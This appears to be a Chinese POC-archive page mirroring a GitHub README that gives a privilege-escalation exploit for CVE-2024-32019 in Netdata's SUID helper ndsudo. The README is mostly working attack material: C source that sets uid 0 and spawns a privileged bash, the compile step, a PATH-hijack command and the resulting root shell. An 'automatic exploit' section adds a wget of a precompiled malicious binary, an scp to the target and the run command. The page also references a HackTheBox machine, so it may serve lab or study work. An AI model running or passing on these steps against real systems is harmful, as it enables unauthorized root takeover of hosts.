目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1310

100%
请我们喝杯咖啡

CVE-2024-32019 PoC — Netdata 安全漏洞

来源
https://github.com/juanbelin/CVE-2024-32019-POC
关联漏洞
标题:Netdata 安全漏洞 (CVE-2024-32019)
Description:Netdata是Netdata开源的一个高保真基础设施监控和故障排除应用程序。 Netdata存在安全漏洞。攻击者利用该漏洞以 root 权限运行任意程序。
Description
Netdata ndsudo local privilage escalation workflow and POC (CVE-2024-32019)
介绍
# CVE-2024-32019-POC
Netdata ndsudo local privilage escalation workflow and POC  (CVE-2024-32019)

- [Workflow](#workflow)
- [Automatic exploit](#automatic-exploit)
- [Resources](#resources)

## Workflow
> [!TIP]
> Please read

Netdata is a tool that provides apps and systems monitoring, it runs at port 19999, easy to find:

```shell
test@test:~$ netstat -tuln
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State     

tcp        0      0 127.0.0.1:19999         0.0.0.0:*               LISTEN  
```

This vulnerability (CVE-2024-32019) **affects** the next versions: `>= v1.45.0, < v1.45.3, >= v1.44.0-60, < v1.45.0-169`. We can make a petition in order to know the version en the Header Reponse: 

<img width="605" height="289" alt="CVE-2024-32019-1" src="https://github.com/user-attachments/assets/121b7527-1c0b-4564-abd9-1b663bfe94f8" />


The exploit occurs by leverage a **PATH Hijacking** of one of their plugins, `ndsudo` which is often located in `/opt/netdata/usr/libexec/netdata/` and which has SUID. 

```shell
test@test:~$ find / -name ndsudo 2> /dev/null
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo
```

<img width="1064" height="51" alt="CVE-2024-32019-2" src="https://github.com/user-attachments/assets/3bfa95c7-614c-48a9-b95f-267ebf26475c" />


We can see what we can do using `--help`

```shell
$ /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo --help

ndsudo

(C) Netdata Inc.

A helper to allow Netdata run privileged commands.

  --test
    print the generated command that will be run, without running it.

  --help
    print this message.

The following commands are supported:

- Command    : nvme-list
  Executables: nvme 
  Parameters : list --output-format=json

- Command    : nvme-smart-log
  Executables: nvme 
  Parameters : smart-log {{device}} --output-format=json

- Command    : megacli-disk-info
  Executables: megacli MegaCli 
  Parameters : -LDPDInfo -aAll -NoLog

- Command    : megacli-battery-info
  Executables: megacli MegaCli 
  Parameters : -AdpBbuCmd -aAll -NoLog

- Command    : arcconf-ld-info
  Executables: arcconf 
  Parameters : GETCONFIG 1 LD

- Command    : arcconf-pd-info
  Executables: arcconf 
  Parameters : GETCONFIG 1 PD

The program searches for executables in the system path.

Variables given as {{variable}} are expected on the command line as:
  --variable VALUE

VALUE can include space, A-Z, a-z, 0-9, _, -, /, and .
```

```shell
test@test:~$ /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo arcconf-ld-info
arcconf : not available in PATH.
```

As we can see, since the script contains several commands to choose that will look for an executable, we can leverage this in order to make our own executable named as one of the executables within a path we can add to the PATH environment variable.  

Netdata use `C`, in consequence, we have to make our script in C and compile it. 

<img width="1127" height="1157" alt="CVE-2024-32019" src="https://github.com/user-attachments/assets/5b9ca43a-3bf4-4158-ae04-956acbce4660" />


```shell
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    setuid(0);
    setgid(0);
    execl("/bin/bash", "bash", "-p", NULL);
    perror("execl");
    return 1;
}
```

```shell
gcc arcconf.c -o arcconf
```

Then as previously discussed, we add the script's path to the $PATH

```shell
test@test:/tmp$ PATH=/tmp:$PATH
```


Finally we simply execute the command that is pointing to our malicious executable (`arcconf-pd-info -> arcconf `) and it is going to give us a privilege shell 
```shell
test@test:/tmp$ /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo arcconf-pd-info
root@editor:/tmp# whoami
root
```

## Automatic exploit 

You can download the already compiled C malicious script that will give you a bash as root as mentioned in the example above:

```shell
wget https://github.com/juanbelin/CVE-2024-32019-POC/raw/refs/heads/main/arcconf 
```

```shell
mv arcconf /tmp #If your target has Internet connectivity

scp ./arcconf test@test:/tmp/arcconf #If your target does not have Internet connectivity
```

```shell
PATH=:/temp:$PATH
```

```shell
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo arcconf-ld-info #The ndsudo path may change 
```


## Resources 

- https://learn.netdata.cloud/docs/collecting-metrics/

- https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93

- https://app.hackthebox.com/machines/684
文件快照

登录后查看神龙缓存的 POC 文件快照

登录查看
备注
    1. 建议优先通过来源进行访问。
    2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
    3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →